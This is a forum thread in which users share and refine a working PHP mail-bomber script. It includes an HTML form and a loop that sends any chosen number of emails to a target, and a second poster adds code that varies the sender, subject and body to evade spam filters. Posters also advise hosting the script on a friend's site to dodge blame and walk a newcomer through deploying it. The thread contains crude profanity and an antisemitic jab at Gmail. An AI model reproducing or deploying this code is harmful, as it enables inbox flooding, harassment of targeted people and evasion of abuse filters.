Jump to content

Featured Replies

Posted

Hello. This is a mail bomber script I coded, it's nothing big, but it does have a unique selling point: an penis for a status bar. This overall increases the stability and speed of the application by simply extending the size of the penis one = for every mail successfully sent.

 

This script relies on a server with PHP, w/ mail setup. It be best to find a friend's site to host this on, so you won't get the blaim. The email will be set to come from whatever the default "from" email address is in php.conf / php.ini (i forgot which it was).

 

Making mail bomber in PHP is actually easier than one would think. PHP already has the mail function set up -- it's just a matter of making a front-end.

 

Anyway. To start our script, we need a handy, crudely made GUI. Name this index.php, but it really can be whatever you want.

 

<html><title>Narlcock Mail Bomb (.01 Alpha)</title>
Now featuring the <i>Narlcock Progress Penis</i> ™

<form name="form" method="post" action="bomb.php">
<p>Number Of Sends: <input type ="text" name="amount"></p>
<p>To: <input type="text" name="toaddress"></p>
<p>Subject: <input type="text" name="subject"></p>
<p>From: <input type="text" name="from"></p>
<p>Message: <textarea name="message"></textarea></p>
<input type="submit" name="Submit" value="BOMB THAT MOTHER FUCKER!">
</form>
<p />

Copyright 2005 NARLCOCK/DEPAKOTE.<br />
</html>

 

and then, "email.php" for the processing.

 

<html><title>Email Sent</title>
<?php
echo "You IP has been recorded for safety reasons: ";
echo $_SERVER['REMOTE_ADDR']."<p />";
echo "8";
$number = 1;
do {
  mail($_POST['toaddress'], $_POST['subject'], $_POST['message'], $_POST['from']);
    echo "=";
    $number++;
    }
   while ($number <= $_POST['amount']);
echo "D";

// Narlcock - removed gay 10 limit "bug"
?>
<p />

This script has been tweaked by NARLCOCK. 2005. COPYRIGHT.</html>

You get the index.php and edit adresses in, then open index.php?
  • Author
  Sidra said:
You get the index.php and edit adresses in, then open index.php?

 

All you really need to do is open index.php in your web browser, and you fill the addresses in the form. :> Click "BOMB THAT MOTHERFUCKER" and it does the rest of the work for you.

i made a mail bomber similar, but i added some basic filter evasion options. i'll paste the filter evasion code

 

note: this used to work on everything, but hotmail picked up on it and i'm pretty sure it's blocked now

 

function filter_success($loops,$to,$filter_subject,$filter_body,$filter_from)
{
for($x = 0; $x <= $loops; $x++)
{
	mail($to,"$filter_x $filter_y $filter_z","$filter_x $filter_y $filter_z","From: $filter_x@$filter_y.$filter_z");
	$filter_x++;
	$filter_y++;
	$filter_z++;
}
print("$loops emails have been successfully sent to $to with filter evasion");
}

 

 

fyi, mail params are mail(<target>, <subject>, <body>, <from>) and my code just changes value of these params [except target]

  • Author
  Quote
theMinkey']i made a mail bomber similar, but i added some basic filter evasion options. i'll paste the filter evasion code

 

note: this used to work on everything, but hotmail picked up on it and i'm pretty sure it's blocked now

 

function filter_success($loops,$to,$filter_subject,$filter_body,$filter_from)
{
for($x = 0; $x <= $loops; $x++)
{
	mail($to,"$filter_x $filter_y $filter_z","$filter_x $filter_y $filter_z","From: $filter_x@$filter_y.$filter_z");
	$filter_x++;
	$filter_y++;
	$filter_z++;
}
print("$loops emails have been successfully sent to $to with filter evasion");
}

 

 

fyi, mail params are mail(<target>, <subject>, <body>, <from>) and my code just changes value of these params [except target]

 

 

This is actually a pretty good idea. Users of the Zionist-Supported Gmail Service have their emails stacked if you bomb them from the same address. This basically makes this easier for the person being bombed because he can delete 50 emails emails by checking one box.

  • 2 months later...
  Goldentooth13 said:
Ok, can someone tell me where i put THIS in?

On your PHP-enabled webhost that has a properly configured mailer daemon (sendmail or an equivalent)

  asterix said:
On your PHP-enabled webhost that has a properly configured mailer daemon (sendmail or an equivalent)

 

PHP-enabled webhost? hmm can you help me out a bit...im kinda new at this.Thnx for the help anyways

  Goldentooth13 said:
PHP-enabled webhost? hmm can you help me out a bit...im kinda new at this.Thnx for the help anyways

 

Do you have a website, or any other kind of webspace?

 

If so, check with them if they support php.

  • 1 month later...
Guest
This topic is now closed to further replies.